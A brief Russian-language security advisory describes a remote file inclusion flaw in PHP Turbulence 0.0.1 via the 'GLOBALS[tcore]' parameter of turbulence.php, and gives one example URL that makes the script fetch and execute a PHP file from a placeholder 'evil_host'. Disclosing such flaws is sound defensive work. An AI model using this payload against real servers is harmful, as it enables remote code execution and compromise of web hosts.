Программа: PHP Turbulence 0.0.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «GLOBALS[tcore]» сценарием turbulence.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.example.com/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt?



Оставить мнение